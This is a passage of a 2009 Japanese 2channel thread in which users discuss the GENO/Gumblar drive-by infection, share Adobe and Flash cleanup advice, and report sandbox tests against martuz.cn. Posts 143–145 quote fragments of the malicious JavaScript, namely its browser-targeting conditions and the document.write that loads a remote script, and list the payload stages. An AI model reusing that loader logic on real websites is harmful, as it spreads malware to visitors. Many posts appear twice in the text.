68 :192.168.0.774:2009/05/23(土) 18:41:44 ID:5P+JCV3b0
>>67
横で猫がキーボードを踏んでないか見るんだ
横で猫がキーボードを踏んでないか見るんだ
69 :192.168.0.774:2009/05/23(土) 18:47:10 ID:Sz6n7xWm0
>>68
ヘッドフォンがキー押してただけだったわ、すまん。
ヘッドフォンがキー押してただけだったわ、すまん。
70 :192.168.0.774:2009/05/23(土) 18:48:10 ID:IKhyILDB0
>>67-69
笑ったwww
笑ったwww
71 :192.168.0.774:2009/05/23(土) 19:07:35 ID:3BjN7uEa0
おいww
72 :192.168.0.774:2009/05/23(土) 19:13:06 ID:sQU+1gs30
和んだw
73 :192.168.0.774:2009/05/23(土) 19:39:42 ID:c4WG3X5q0
>>67-69
不覚にも
不覚にも
74 :192.168.0.774:2009/05/23(土) 19:41:34 ID:OA8HLuhR0
75 :192.168.0.774:2009/05/23(土) 19:54:11 ID:a/bRTiGj0
>>67-69
なぜ13分もかかったw
なぜ13分もかかったw
76 :192.168.0.774:2009/05/23(土) 19:56:05 ID:imZ1efiC0
>>67-69
和ませるなw
和ませるなw
77 :192.168.0.774:2009/05/23(土) 20:18:28 ID:kR9G4T450
今は小休止状態みたいなので質問させていただきたいのですが、先週木曜日に初めて
GENOウイルスのことを知ったときに、Adobe関係は全部アンインストールいたしました。
と思っていたのですが後で、もう一度、プログラム一覧を見直したところ、
Korean Fonts Support For Adobe Reader8.1.0というのが残っていました。
どうやら一連のAdobe製品と離れた位置に在ったので見落としていたようです。
そのときは速攻アンインストールしたのですが、後で気になってググってみても、
検索結果は 外国語のページのものが多く、直接Adobeのサイトにも行きましたが、
もう一つ、はっきりとした記述がありません。
私がフォントファイルの意味を もう一つ はっきりと理解していないせいもありますが、
まあアジア拡張言語フォントパックの中の一つらしい というぐらいは分かりました。
そこで、もう一度ダウンロードして、起動させるなりプロパティを見るなりして
正体を確かめようとしたのですが、今度は、(以下、テキトー訳)
このインストールには あなたのシステム上にインストールされたAdobe Reader8.1.0が必要です。
このインストーラーを起動する前に、Adobe Reader8.1.0をインストールしてください
みたいな表示が出て、インストールできません。
これは、いわゆる言語パッチといわれる類のものなのでしょうか? もし、
そうなら放っておいても、単独で起動することはないでしょうから安心ですが……。
そういえば、ファイルサイズも、3.9メガバイトと小さかったように思います。
長文になってしまい、スミマセン。さんざん既出の質問なら、
チラシの裏、乙 で捨て置かれて結構です。
GENOウイルスのことを知ったときに、Adobe関係は全部アンインストールいたしました。
と思っていたのですが後で、もう一度、プログラム一覧を見直したところ、
Korean Fonts Support For Adobe Reader8.1.0というのが残っていました。
どうやら一連のAdobe製品と離れた位置に在ったので見落としていたようです。
そのときは速攻アンインストールしたのですが、後で気になってググってみても、
検索結果は 外国語のページのものが多く、直接Adobeのサイトにも行きましたが、
もう一つ、はっきりとした記述がありません。
私がフォントファイルの意味を もう一つ はっきりと理解していないせいもありますが、
まあアジア拡張言語フォントパックの中の一つらしい というぐらいは分かりました。
そこで、もう一度ダウンロードして、起動させるなりプロパティを見るなりして
正体を確かめようとしたのですが、今度は、(以下、テキトー訳)
このインストールには あなたのシステム上にインストールされたAdobe Reader8.1.0が必要です。
このインストーラーを起動する前に、Adobe Reader8.1.0をインストールしてください
みたいな表示が出て、インストールできません。
これは、いわゆる言語パッチといわれる類のものなのでしょうか? もし、
そうなら放っておいても、単独で起動することはないでしょうから安心ですが……。
そういえば、ファイルサイズも、3.9メガバイトと小さかったように思います。
長文になってしまい、スミマセン。さんざん既出の質問なら、
チラシの裏、乙 で捨て置かれて結構です。
78 :192.168.0.774:2009/05/23(土) 20:35:03 ID:C376xCRT0
>>77
なんでそこまで長文になったのかわからんけど
Korean Fonts Support For Adobe Reader8.1.0
これはフォントの追加パッケージみたいなもんだとおもう
アンインストールしたならそれで問題ないです
インストールする必要はありません
あとプログラムの追加と削除には出ないIE用FlashPlayerは残ってると思います
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ここでバージョンを確認して最新版をいれてください
なんでそこまで長文になったのかわからんけど
Korean Fonts Support For Adobe Reader8.1.0
これはフォントの追加パッケージみたいなもんだとおもう
アンインストールしたならそれで問題ないです
インストールする必要はありません
あとプログラムの追加と削除には出ないIE用FlashPlayerは残ってると思います
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ここでバージョンを確認して最新版をいれてください
79 :192.168.0.774:2009/05/23(土) 20:41:58 ID:GyZU8Yee0
延々とブルスクが繰り返されるようになって起動しなくなってしまった・・・
もうこの状態になったらどうすればいいのかさっぱりだ
クリーンインストールは無理なのかな?
もうこの状態になったらどうすればいいのかさっぱりだ
クリーンインストールは無理なのかな?
80 :192.168.0.774:2009/05/23(土) 20:47:19 ID:F81SI+Tt0
セーフモードでも起動しないならクリーンインストール
81 :192.168.0.774:2009/05/23(土) 22:00:43 ID:hutaJPqN0
82 :192.168.0.774:2009/05/23(土) 22:30:15 ID:C376xCRT0
>>79
クリーンインストールはできるよ
クリーンインストールはできるよ
83 :192.168.0.774:2009/05/23(土) 23:21:47 ID:BukbC16CP
感染したらバックアップソフトで復元すれば大丈夫かな?
84 :192.168.0.774:2009/05/24(日) 00:47:38 ID:Ai80SDN30
GhostやTrue Imageのような丸々復元するソフトなら大丈夫。
85 :192.168.0.774:2009/05/24(日) 01:02:36 ID:r2Cbq1zZ0
>>78
うち(XPSP3 FlashPlayer 10)では、プログラムの追加と削除に
adobe Flash Player 10 AcriveX として出るけどな。
まぁ、サイトで確認するのはいいことだと思うけど。
>>83
True ImageのスレッドでSystem Volume Infomation やバックアップの暗号化について訊いている人がいたな。
まぁ、外付けHDDとかに退避した方がより、安全だとは思うけど。
>>81
Puppyって知らなかった。
うち(XPSP3 FlashPlayer 10)では、プログラムの追加と削除に
adobe Flash Player 10 AcriveX として出るけどな。
まぁ、サイトで確認するのはいいことだと思うけど。
>>83
True ImageのスレッドでSystem Volume Infomation やバックアップの暗号化について訊いている人がいたな。
まぁ、外付けHDDとかに退避した方がより、安全だとは思うけど。
>>81
Puppyって知らなかった。
86 :192.168.0.774:2009/05/24(日) 01:07:19 ID:heAsx668P
俺も外付けにTrue Imageでバックアップしてるよ
87 :192.168.0.774:2009/05/24(日) 01:47:33 ID:aJuP8TRJ0
>>78さん、残っていました。アドオンの中に、flash shockwaveが。
いろいろ確認したので、返事が遅くなって、すみません。
アンインストールするときに、確か Firefox用アドオンとIF用プラグインを削除します
とか出たので、自分では残っていないつもりでした。
これは、昔から、スレにいる人には、割と周知の事実なんでしょうか?
もしかしたら最近のスレでも話題に登っていたのかもしれませんが、割と聞き逃していました。
お恥ずかしい限りです。IE7の場合(8と6は未使用のため)「ツール」→「アドオンの管理」→「アドオンの有効と無効」→デフォルトの「現在 Internet Explper で読み込まれて
いるアドオン」で探したときには見つからなくて、他の方法で確認しようとしましたが、
後で入っているのに気がついてからアドオンの有効と無効を見たら、「許可なしで実行される
アドオン」とか他の項目のところには、ちゃんと表示されていました。
まとめも、ざっとですが見にいってきましたが、ちょっと どこに書いてあるか確認できませんでした。
>>なんでそこまで長文になったのかわからんけど
すみません。きっと説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Kor
いろいろ確認したので、返事が遅くなって、すみません。
アンインストールするときに、確か Firefox用アドオンとIF用プラグインを削除します
とか出たので、自分では残っていないつもりでした。
これは、昔から、スレにいる人には、割と周知の事実なんでしょうか?
もしかしたら最近のスレでも話題に登っていたのかもしれませんが、割と聞き逃していました。
お恥ずかしい限りです。IE7の場合(8と6は未使用のため)「ツール」→「アドオンの管理」→「アドオンの有効と無効」→デフォルトの「現在 Internet Explper で読み込まれて
いるアドオン」で探したときには見つからなくて、他の方法で確認しようとしましたが、
後で入っているのに気がついてからアドオンの有効と無効を見たら、「許可なしで実行される
アドオン」とか他の項目のところには、ちゃんと表示されていました。
まとめも、ざっとですが見にいってきましたが、ちょっと どこに書いてあるか確認できませんでした。
>>なんでそこまで長文になったのかわからんけど
すみません。きっと説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Kor
88 :192.168.0.774:2009/05/24(日) 01:52:26 ID:aJuP8TRJ0
>>なんでそこまで長文になったのかわからんけど
すみません。きっと、説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Koreanなんちゃらを 自分と同じように
アンインストール派の人で 消し忘れてる人いるだろうけど、これって無害なの?
ってことです。でも、Flash・Shockwaveのほうが、よっぽど恐ろしかったです。
これは、やっぱりアップデート派の人の
ほうが正解かな??
なんで途中で消えたんだろう。あっ、書き込み完了する前に、
タブ移動したからかな。
すみません。きっと、説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Koreanなんちゃらを 自分と同じように
アンインストール派の人で 消し忘れてる人いるだろうけど、これって無害なの?
ってことです。でも、Flash・Shockwaveのほうが、よっぽど恐ろしかったです。
これは、やっぱりアップデート派の人の
ほうが正解かな??
なんで途中で消えたんだろう。あっ、書き込み完了する前に、
タブ移動したからかな。
89 :192.168.0.774:2009/05/24(日) 02:07:23 ID:2VJlz39B0
>>88
なんか、勘違いしているようだけど、ShockwaveはFlashplayerとは違うよ。
Shockwaveは2006年の2月のが最新
http://www.adobe.com/support/security/#shockwave
Adobe Shockwave と Flash Playerのテスト
http://www.adobe.com/jp/shockwave/welcome/
ここで両方をテストできる。
Shockwaveなんてなくて困らないから、アンインストールしたままがいいだろうけどね。
なんか、勘違いしているようだけど、ShockwaveはFlashplayerとは違うよ。
Shockwaveは2006年の2月のが最新
http://www.adobe.com/support/security/#shockwave
Adobe Shockwave と Flash Playerのテスト
http://www.adobe.com/jp/shockwave/welcome/
ここで両方をテストできる。
Shockwaveなんてなくて困らないから、アンインストールしたままがいいだろうけどね。
90 :192.168.0.774:2009/05/24(日) 02:11:49 ID:dPjaiBoy0
2ch的には収束に向かってるの?
91 :192.168.0.774:2009/05/24(日) 02:17:06 ID:2b1ExXhKP
Flash Playerが9.0.124.0以上でAdobe Readerが9.1以上なら感染しない
収束しないほうがおかしいだろ
収束しないほうがおかしいだろ
92 :192.168.0.774:2009/05/24(日) 02:17:24 ID:oOp80I+s0
新ネタ待ち。GENO系の次が出てくるか、別のウイルスが話題になるかはわからない
不安な人は引き続き不安、困ってる人は引き続き困ってるので、解決したってわけじゃない
不安な人は引き続き不安、困ってる人は引き続き困ってるので、解決したってわけじゃない
93 :192.168.0.774:2009/05/24(日) 02:22:29 ID:HFhRBZx00
USCERTやセキュリティ企業が動き始めた段階でサーバ停止
もう十分な量のボットは確保しただろうし後は儲けるだけなんじゃねえの
もう十分な量のボットは確保しただろうし後は儲けるだけなんじゃねえの
94 :192.168.0.774:2009/05/24(日) 02:23:15 ID:Q8xZKwGm0
感染しても顕著な症状がでないので気付いてない人も多いし。
95 :192.168.0.774:2009/05/24(日) 02:32:01 ID:jcHTZiwS0
>>4
このウィルスチェッカー置いてるトコが感染する事ないの?
このウィルスチェッカー置いてるトコが感染する事ないの?
96 :192.168.0.774:2009/05/24(日) 02:40:08 ID:332mANDn0
Puppyってあるんだな。
試してみようかなー。
試してみようかなー。
97 :192.168.0.774:2009/05/24(日) 06:37:27 ID:uAVXuYQE0
今頃になって感染するって、どこから拾ってきてんだよ
亜種がどうなるかは知らんけど、
使われてたのは3月に塞がれた穴だったらしいな
なんかもう、感染した奴乙としか言いようがない。
亜種がどうなるかは知らんけど、
使われてたのは3月に塞がれた穴だったらしいな
なんかもう、感染した奴乙としか言いようがない。
98 :192.168.0.774:2009/05/24(日) 07:49:59 ID:aJuP8TRJ0
>>89、すみません。呼び名も意味も、全部、間違ってました。
Shockwave Flashは、Flash Playaerの子供みたいなものかと思っていたのですが、
Shockwave Flash は、ActiveXコントロール系だったのですね。まだ、よく分かってませんが。
なんスレか前でスレの皆さんが話してたはずなのに、失念してました。
大手動画サイトが古いバージョンのFlash Playerを勝手に呼び出すと、
どなたかが話してたの思い出して、確かめに回った後だったのに。
ようつべ、にこ動、やふー動画は、ちゃんとFlash Playerが
古いバージョンもしくは入っていません と警告してくれましたよ。
Googleは微妙、いきなりインスコしろ、言ってきた。
Shockwave Flashは、Flash Playaerの子供みたいなものかと思っていたのですが、
Shockwave Flash は、ActiveXコントロール系だったのですね。まだ、よく分かってませんが。
なんスレか前でスレの皆さんが話してたはずなのに、失念してました。
大手動画サイトが古いバージョンのFlash Playerを勝手に呼び出すと、
どなたかが話してたの思い出して、確かめに回った後だったのに。
ようつべ、にこ動、やふー動画は、ちゃんとFlash Playerが
古いバージョンもしくは入っていません と警告してくれましたよ。
Googleは微妙、いきなりインスコしろ、言ってきた。
99 :192.168.0.774:2009/05/24(日) 08:31:42 ID:oOp80I+s0
100 :192.168.0.774:2009/05/24(日) 08:56:50 ID:GCI88weB0
これホント?
>212 ユキワリコザクラ(関東地方) [] 2009/05/23(土) 22:39:52.90 ID:6wvDjucY
>
>XPユーザー、慌てるな
>GENOってVistaの場合、UACが有効なら大丈夫
>であれば、XPの場合、常に非管理者権限で使用してれば感染しないぞ
>パワーユーザーに権限を落とせ(必要時のみadminで運用)
>212 ユキワリコザクラ(関東地方) [] 2009/05/23(土) 22:39:52.90 ID:6wvDjucY
>
>XPユーザー、慌てるな
>GENOってVistaの場合、UACが有効なら大丈夫
>であれば、XPの場合、常に非管理者権限で使用してれば感染しないぞ
>パワーユーザーに権限を落とせ(必要時のみadminで運用)
101 :192.168.0.774:2009/05/24(日) 09:10:20 ID:h/uTUbue0
>>100
思いっきりガセ
思いっきりガセ
102 :192.168.0.774:2009/05/24(日) 10:01:48 ID:O1GwBAYN0
>>100
「制限付きアカウントで使用」ならホント
「制限付きアカウントで使用」ならホント
103 :192.168.0.774:2009/05/24(日) 10:08:59 ID:oOp80I+s0 BE:2120544588-2BP(0)
砂箱で実験したとき、Drivers32に書き込めないと失敗することがわかってる
ここへの書き込みは、通常Administrators以上なので、たぶんそうなんだろう
VMで実験した人の確定情報待ち
ここへの書き込みは、通常Administrators以上なので、たぶんそうなんだろう
VMで実験した人の確定情報待ち
104 :192.168.0.774:2009/05/24(日) 10:35:59 ID:O1GwBAYN0
VMじゃないが、実験用に仕立てた実機でmartuz.cn を試した。
汚染サイトに接続すると
Temporary Internet Filesへ侵入→martuz.cn からの本体ダウンロード→
ダウンロードしたウィルスの実行
までは成功するが、レジストリの書き換えと%Root%以下のフォルダへの
書き込みに失敗するので、最終的な感染までは進行しなかった。
XP-SP3の制限付きアカウントでの実験な。
Power Userでは未テスト。防げないような気がするが。
制限アカウントで防いだ後は、キャッシュを消すのを忘れるなよw
汚染サイトに接続すると
Temporary Internet Filesへ侵入→martuz.cn からの本体ダウンロード→
ダウンロードしたウィルスの実行
までは成功するが、レジストリの書き換えと%Root%以下のフォルダへの
書き込みに失敗するので、最終的な感染までは進行しなかった。
XP-SP3の制限付きアカウントでの実験な。
Power Userでは未テスト。防げないような気がするが。
制限アカウントで防いだ後は、キャッシュを消すのを忘れるなよw
105 :192.168.0.774:2009/05/24(日) 11:07:07 ID:oOp80I+s0
よく考えたら、Power Users はXPHomeとかにはないので、やるならどのみちUsers以下か。
106 :192.168.0.774:2009/05/24(日) 11:39:01 ID:yKvhjVD20
107 :192.168.0.774:2009/05/24(日) 12:06:57 ID:hqpRrEcb0
108 :192.168.0.774:2009/05/24(日) 12:14:57 ID:1zACvPr80
力のあるユーザーか。
109 :192.168.0.774:2009/05/24(日) 12:27:23 ID:tFlhttKu0
カスペのスキャンで悪意が存在するプログラムkeyloggerが検出されたんですが
これはGENOでしょうか。
これはGENOでしょうか。
110 :192.168.0.774:2009/05/24(日) 12:28:13 ID:WEGukwsK0
それだけではカスペ使ってる人じゃないと分からないと思うので
エスパーが来るまで待って下さい
エスパーが来るまで待って下さい
111 :192.168.0.774:2009/05/24(日) 12:31:32 ID:tFlhttKu0
112 :192.168.0.774:2009/05/24(日) 12:49:40 ID:VjMCeEMy0
だめだこりゃ
113 :192.168.0.774:2009/05/24(日) 13:32:18 ID:ufM6MerJ0
.
114 :192.168.0.774:2009/05/24(日) 13:37:38 ID:h/uTUbue0
>>111
皮肉言われてるのに気付いてくれ。おとといきやがれといっしょ。
キーロガーというだけでは、GENOのスクリプトが落としてきたもののバリエーションの1つの可能性も
無関係のどこかで拾ってきたものの可能性もある。ゲーム等で、自前の内容にDinputを置き換えるような奴が、
キーロガーとして検知されることもあるし
エスパーでなければ回答できない。誰も回答できないから諦めろ。
どうしても回答が欲しければ、カスペのスレで、検出名と検出されたファイル名、踏んだ心当たりを正確に
書いて質問すればいい。とにかくここでは、回答貰えません。出直しなさい。
>>112
(゜゜)(。。)うんうん
皮肉言われてるのに気付いてくれ。おとといきやがれといっしょ。
キーロガーというだけでは、GENOのスクリプトが落としてきたもののバリエーションの1つの可能性も
無関係のどこかで拾ってきたものの可能性もある。ゲーム等で、自前の内容にDinputを置き換えるような奴が、
キーロガーとして検知されることもあるし
エスパーでなければ回答できない。誰も回答できないから諦めろ。
どうしても回答が欲しければ、カスペのスレで、検出名と検出されたファイル名、踏んだ心当たりを正確に
書いて質問すればいい。とにかくここでは、回答貰えません。出直しなさい。
>>112
(゜゜)(。。)うんうん
115 :192.168.0.774:2009/05/24(日) 13:40:05 ID:tFlhttKu0
>>114
すみませんでした。
すみませんでした。
116 :192.168.0.774:2009/05/24(日) 15:23:22 ID:2W8NCPrM0
117 :192.168.0.774:2009/05/24(日) 15:25:36 ID:74FjqYRv0
>>114
優しいですね
優しいですね
118 :192.168.0.774:2009/05/24(日) 18:18:32 ID:SX0zJqf70
Meだから安心
119 :192.168.0.774:2009/05/24(日) 18:31:56 ID:l6NMT+y60
ごしゅじんさまにあえて、えむいはしあわs…
120 :192.168.0.774:2009/05/24(日) 19:46:13 ID:CuuFY58N0
やめろおおおお
121 :192.168.0.774:2009/05/24(日) 19:48:55 ID:INl1BLTo0
やめて涙出るからやめて
Me使ったことないけど泣けるからw
Me使ったことないけど泣けるからw
122 :192.168.0.774:2009/05/24(日) 20:32:50 ID:DbyLrNnz0
Meたん使いの俺号泣
123 :192.168.0.774:2009/05/24(日) 21:27:10 ID:gNsaRzby0
時代が進めばそのうち
ごしゅじんさまにあえて、えっくすぴーはしあわs…
になる時が来るのか
ごしゅじんさまにあえて、えっくすぴーはしあわs…
になる時が来るのか
124 :192.168.0.774:2009/05/24(日) 21:29:55 ID:oOp80I+s0
たぶん、【32bit】まだまだXPを使い続けるスレ 13GB【CD-ROM】とかいうスレが立ってるw
125 :192.168.0.774:2009/05/24(日) 21:50:40 ID:knIrnezr0
このスレも低レベル化してきたか…
情報提供とかする必要ないよね…こんな民度なら。
情報提供とかする必要ないよね…こんな民度なら。
126 :192.168.0.774:2009/05/24(日) 21:55:18 ID:lzXlDT8y0
>>125
ま、本当に情報提供できる奴なら言い訳じみた愚痴よりも情報が先に出るもんだがな
ま、本当に情報提供できる奴なら言い訳じみた愚痴よりも情報が先に出るもんだがな
127 :192.168.0.774:2009/05/24(日) 22:04:44 ID:kwJlcu/p0
わー125は高レベルでとんでもなく民度が高いんですねーすごいなー
なんで2ちゃんのスレなんかに書き込みしてるのー?
うつっちゃうよ?w
なんで2ちゃんのスレなんかに書き込みしてるのー?
うつっちゃうよ?w
128 :192.168.0.774:2009/05/24(日) 22:17:35 ID:knIrnezr0
今までVMでの感染確認とか検体提供とかやってきたけど、うつっちゃうらしいからやめます
で、もうここにも来ませんので安心して書き込み続けてください
で、もうここにも来ませんので安心して書き込み続けてください
129 :192.168.0.774:2009/05/24(日) 22:19:28 ID:zG/5ojVF0
セキュ板帰ろうぜ
130 :192.168.0.774:2009/05/24(日) 22:24:30 ID:oOp80I+s0
>>128 皮肉を込めたつもりだろうが、ま、踏むスレで会おう
131 :192.168.0.774:2009/05/24(日) 22:44:06 ID:YgJDyVRl0
レベルと民度がうつっちゃう言われてんのに聞かないから…
132 :192.168.0.774:2009/05/24(日) 22:53:05 ID:heAsx668P
最近、沈静化して来た?
133 :192.168.0.774:2009/05/24(日) 22:59:56 ID:inQC6pkk0
134 :192.168.0.774:2009/05/24(日) 23:04:14 ID:aJuP8TRJ0
高レベルな人向けのスレって別にできたんじゃなかったの。
大事な情報は、そっちに上げたほうがいいと思う。
ここは、一般向けの情報で十分なのでは?
大事な情報は、そっちに上げたほうがいいと思う。
ここは、一般向けの情報で十分なのでは?
135 :192.168.0.774:2009/05/24(日) 23:16:40 ID:nMp8odr00
すっごくむかついたんだろうなあw
分かるよその気持ちw
分かるよその気持ちw
136 :192.168.0.774:2009/05/25(月) 00:53:49 ID:kdtDbFTU0
>>132
本体配布サイトが止まってるからね。
本体配布サイトが止まってるからね。
137 :192.168.0.774:2009/05/25(月) 02:34:31 ID:Not8R34U0
138 :192.168.0.774:2009/05/25(月) 02:48:16 ID:29sMFtyK0
139 :192.168.0.774:2009/05/25(月) 03:03:15 ID:Not8R34U0
あっ、はい。そうだとは思いましたが、ほかにも情報提供に来る人がいて、
レス読んで帰っちゃうといけないと思って。差し出がましいことをしました。
レス読んで帰っちゃうといけないと思って。差し出がましいことをしました。
140 :192.168.0.774:2009/05/25(月) 03:52:16 ID:g0EArU8a0
まだ出てない情報って何がある?
C&C鯖がウクライナとイギリスにあってまだ生きてる
とか使用も無い情報しか知らないんだけど
C&C鯖がウクライナとイギリスにあってまだ生きてる
とか使用も無い情報しか知らないんだけど
141 :192.168.0.774:2009/05/25(月) 09:30:19 ID:orpiBNMg0
最新の情報じゃないかもしれないけど感染したサイトのJSってIEじゃないとifで弾かれるよね?つまりIEじゃなきゃ感染しないよね?
142 :192.168.0.774:2009/05/25(月) 09:52:49 ID:OIu3WwGb0
あれ、chrome以外はみんな対象じゃなかったっけ
143 :192.168.0.774:2009/05/25(月) 09:57:19 ID:OIu3WwGb0
うん、やっぱりIEも火狐もOperaもSafariも感染対象
http://takeshima.2ch.net/test/read.cgi/news4vip/1242637188/503
503 名前:以下、名無しにかわりましてVIPがお送りします:2009/05/18(月) 20:50:57.57 ID:PuSZbVxyP
コード展開して見てみたら、最後に読み込ませるかどうかの部分にこんな処理が
if(
(u.indexOf("Chrome")<0)//Google Chromeでなく
&&
(u.indexOf("Win")>0)//かつWindowsで
&&
(u.indexOf("NT 6")<0)//なおかつWindows 6=Vistaでなく
&&
(document.cookie.indexOf("miek=1")<0)//かつ踏んで感染したときにつけられるデータがなく(=踏むのがはじめてで)
&&
(typeof(zrvzts)!=typeof("A"))//かつリロードしてない、初めての読み込みであるとき
){
DLさせる処理
}
http://takeshima.2ch.net/test/read.cgi/news4vip/1242637188/503
503 名前:以下、名無しにかわりましてVIPがお送りします:2009/05/18(月) 20:50:57.57 ID:PuSZbVxyP
コード展開して見てみたら、最後に読み込ませるかどうかの部分にこんな処理が
if(
(u.indexOf("Chrome")<0)//Google Chromeでなく
&&
(u.indexOf("Win")>0)//かつWindowsで
&&
(u.indexOf("NT 6")<0)//なおかつWindows 6=Vistaでなく
&&
(document.cookie.indexOf("miek=1")<0)//かつ踏んで感染したときにつけられるデータがなく(=踏むのがはじめてで)
&&
(typeof(zrvzts)!=typeof("A"))//かつリロードしてない、初めての読み込みであるとき
){
DLさせる処理
}
144 :192.168.0.774:2009/05/25(月) 10:05:54 ID:9na8SiBQ0
続きがあるんだよ
> if(window.ScriptEngine) j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;
> document.write("<script src=//****"+"**.**/vid/?id="+j+"><\/script>");
Safari/Winで踏むと、?id= のうしろが最終的にブランクになる
このGETに対して何か鯖側が準備してたかってことになるわけ
してたかもしれんし、してなかったかもしれん
> if(window.ScriptEngine) j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;
> document.write("<script src=//****"+"**.**/vid/?id="+j+"><\/script>");
Safari/Winで踏むと、?id= のうしろが最終的にブランクになる
このGETに対して何か鯖側が準備してたかってことになるわけ
してたかもしれんし、してなかったかもしれん
145 :192.168.0.774:2009/05/25(月) 10:07:49 ID:xQ23/q8u0
1.js(>>143)
2.id=100 or id=101(ie not ie (script))
3.id=2 and id=3(pdf and flash)
4.id=10(exe)
5.ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
2.id=100 or id=101(ie not ie (script))
3.id=2 and id=3(pdf and flash)
4.id=10(exe)
5.ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
146 :192.168.0.774:2009/05/25(月) 11:25:57 ID:l1RBWHbr0
いまさら何言ってんだか
IEでなくても普通にpdf/swf落ちてきてたから
IEでなくても普通にpdf/swf落ちてきてたから
147 :192.168.0.774:2009/05/25(月) 12:18:46 ID:zMoesA260
zlkonでは無指定でも落ちてきた
martuzでは指定パターンによって落ちてこなくなった
gunblarがどっちだったかは知らん
martuzでは指定パターンによって落ちてこなくなった
gunblarがどっちだったかは知らん
148 :192.168.0.774:2009/05/25(月) 12:31:02 ID:tQ4f0t5i0
>>98
そうじゃなくて、
Shockwave FlashとFlash PlayaerそれぞれにFirefoxとか用のPlugin版とIE専用のActiveX版があるの。
だから、4種類全部がインストールされている人もいるわけ。
そうじゃなくて、
Shockwave FlashとFlash PlayaerそれぞれにFirefoxとか用のPlugin版とIE専用のActiveX版があるの。
だから、4種類全部がインストールされている人もいるわけ。
149 :192.168.0.774:2009/05/25(月) 15:08:58 ID:L01Nn5aV0
パソコン初心者板の「初心者スレッド」っていうの開いたら
ノートン先生が怒ったんですがウィルスですか?
リンク踏んだわけじゃなくてスレ開いただけなんですが
ノートン先生が怒ったんですがウィルスですか?
リンク踏んだわけじゃなくてスレ開いただけなんですが
150 :192.168.0.774:2009/05/25(月) 15:10:33 ID:/uV5OlPd0
なぜそれをここで聞く?
151 :192.168.0.774:2009/05/25(月) 15:15:44 ID:L01Nn5aV0
2ちゃんスレも危ないのかと思ったんです、すみません
152 :192.168.0.774:2009/05/25(月) 15:21:34 ID:/uV5OlPd0
じゃあここも2ちゃんだから危ないね
他のところで聞くなり調べるなりしたほうがいいよ
他のところで聞くなり調べるなりしたほうがいいよ
153 :192.168.0.774:2009/05/25(月) 15:28:05 ID:L01Nn5aV0
初心者板でなければどこで・・
ノートン誤作動で聞けばいいでしょうか
ノートン誤作動で聞けばいいでしょうか
154 :192.168.0.774:2009/05/25(月) 15:33:24 ID:b26zynpUP
海外もサイトも感染してるな
155 :192.168.0.774:2009/05/25(月) 15:35:05 ID:xQ23/q8u0
海外も3月末から感染しまくってますが、どうかされましたか
156 :192.168.0.774:2009/05/25(月) 15:35:17 ID:xwO8FSQb0
そりゃ、海外から来たウイルスだからな
157 :192.168.0.774:2009/05/25(月) 16:03:57 ID:9na8SiBQ0
スレ違いにあたるのでヒントだけ
2ちゃんねる ノートン でぐぐる。対策はなにげに面倒だったりするが、まずはなにごとか知ること
2ちゃんねる ノートン でぐぐる。対策はなにげに面倒だったりするが、まずはなにごとか知ること
158 :192.168.0.774:2009/05/25(月) 16:44:23 ID:g0EArU8a0
SafariなんぞWin98と同じで眼中に無かっただけだろ
159 :192.168.0.774:2009/05/25(月) 17:29:01 ID:kdtDbFTU0
ノートントラップのことは初心者スレで聞けよ
160 :192.168.0.774:2009/05/25(月) 17:38:15 ID:YvB3PQLE0
リストって情報古いまま?
pixivが一部感染になってるけどこれは…
pixivが一部感染になってるけどこれは…
161 :192.168.0.774:2009/05/25(月) 17:55:54 ID:d34ru99R0
あのリストとチェックサイトの件は無かったことにしたほうがいいよ
今となってはかえって混乱を増幅してる
今となってはかえって混乱を増幅してる
162 :192.168.0.774:2009/05/25(月) 19:48:26 ID:d84pSB9l0
163 :192.168.0.774:2009/05/25(月) 21:41:49 ID:JhdhMmYC0
GENOの所が、またやらかしたらしい・・・
378 名前:Socket774 投稿日:2009/05/25(月) 14:40:04 ID:Xd8gaLc7
GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<)
380 名前:Socket774 投稿日:2009/05/25(月) 15:15:22 ID:b7/1msFI
>>378は、他人のID使ったなりすまし犯罪者ですね、わかります。
381 名前:378 投稿日:2009/05/25(月) 15:25:46 ID:Xd8gaLc7
>>380
なりすましじゃないよ。
注文照会したら、「注文された商品はありません」ってなってたから、
おかしいって思って、ポイント照会したら、他人のIDがでてきた。
で、会員情報の修正って所をクリックしたら…。
382 名前:Socket774 投稿日:2009/05/25(月) 15:33:03 ID:b7/1msFI
ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、
自分の情報が閲覧できないぞ。
383 名前:378 投稿日:2009/05/25(月) 15:34:19 ID:Xd8gaLc7
>>382
だろ。
自分の個人情報も変えれねーwww
378 名前:Socket774 投稿日:2009/05/25(月) 14:40:04 ID:Xd8gaLc7
GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<)
380 名前:Socket774 投稿日:2009/05/25(月) 15:15:22 ID:b7/1msFI
>>378は、他人のID使ったなりすまし犯罪者ですね、わかります。
381 名前:378 投稿日:2009/05/25(月) 15:25:46 ID:Xd8gaLc7
>>380
なりすましじゃないよ。
注文照会したら、「注文された商品はありません」ってなってたから、
おかしいって思って、ポイント照会したら、他人のIDがでてきた。
で、会員情報の修正って所をクリックしたら…。
382 名前:Socket774 投稿日:2009/05/25(月) 15:33:03 ID:b7/1msFI
ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、
自分の情報が閲覧できないぞ。
383 名前:378 投稿日:2009/05/25(月) 15:34:19 ID:Xd8gaLc7
>>382
だろ。
自分の個人情報も変えれねーwww
164 :192.168.0.774:2009/05/25(月) 21:54:51 ID:+y9+ZUOu0
さすがGENOさん!俺たちに(以下ry
つか、こんな騒動があっても利用する奴が居る事に驚いた。
つか、こんな騒動があっても利用する奴が居る事に驚いた。
